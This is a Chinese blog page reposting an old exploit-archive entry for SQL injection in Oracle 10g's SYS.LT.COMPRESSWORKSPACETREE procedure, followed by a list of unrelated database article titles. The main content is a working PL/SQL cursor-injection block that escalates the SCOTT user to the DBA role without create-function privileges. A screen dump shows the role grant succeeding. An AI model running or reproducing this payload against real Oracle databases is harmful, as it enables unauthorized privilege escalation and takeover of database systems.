博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
阅读量:2435 次
发布时间:2019-05-10

本文共 1975 字,大约阅读时间需要 6 分钟。

This is slightly modified version of: http://milw0rm.com/exploits/7677 This is based on cursor injection and does not need create function privileges: DECLARE D NUMBER; BEGIN D := DBMS_SQL.OPEN_CURSOR; DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0); SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--'); SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--'); end; #-----------screen dump---------------------------------------------------# SQL> select * from user_role_privs; USERNAME                       GRANTED_ROLE                   ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SCOTT                          CONNECT                        NO  YES NO SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO SCOTT                          RESOURCE                       NO  YES NO SQL> DECLARE   2  D NUMBER;   3  BEGIN   4  D := DBMS_SQL.OPEN_CURSOR;   5  DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme diate ''grant dba to scott'';commit;end;',0);   6  SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');   7  SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');   8  end;   9  10  11  / DECLARE * ERROR at line 1: ORA-01403: no data found ORA-06512: at "SYS.LT", line 6118 ORA-06512: at "SYS.LT", line 6087 ORA-06512: at line 7 SQL> select * from user_role_privs; USERNAME                       GRANTED_ROLE                   ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SCOTT                          CONNECT                        NO  YES NO SCOTT                          DBA                            NO  YES NO SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO SCOTT                          RESOURCE                       NO  YES NO Sid www.notsosecure.com # milw0rm.com [2009-07-02]

转载地址:http://nommb.baihongyu.com/

你可能感兴趣的文章
CaliberRM 需求管理系统
查看>>
需求管理工具试用 – CaliberRM
查看>>
一年的测试生活和感悟
查看>>
黑盒测试
查看>>
没有需求就没有软件——需求工程简论
查看>>
使用PHP开发SCA和SDO
查看>>
通过RUP用例进行需求管理的可追踪性策略(2)
查看>>
持续改进之配置管理变更的关键路径
查看>>
SCA客户端以及基于Java的模型实现(四)
查看>>
ora2pg 字符集 转换问题总结
查看>>
postgresql 优化与维护
查看>>
mongodb replica sets 测试
查看>>
linux AS6.2 与 as5.4 的对比,性能提升明显
查看>>
FLASHCACHE 的是是非非
查看>>
length() between oracle and postgresql
查看>>
求无序数组总第n大的数
查看>>
99-lisp lisp 的99个问题 P1-10
查看>>
PG 函数的易变性(Function Volatility Categories)
查看>>
Lisp Quote 和Backquote分析
查看>>
PG psql 变彩色显示
查看>>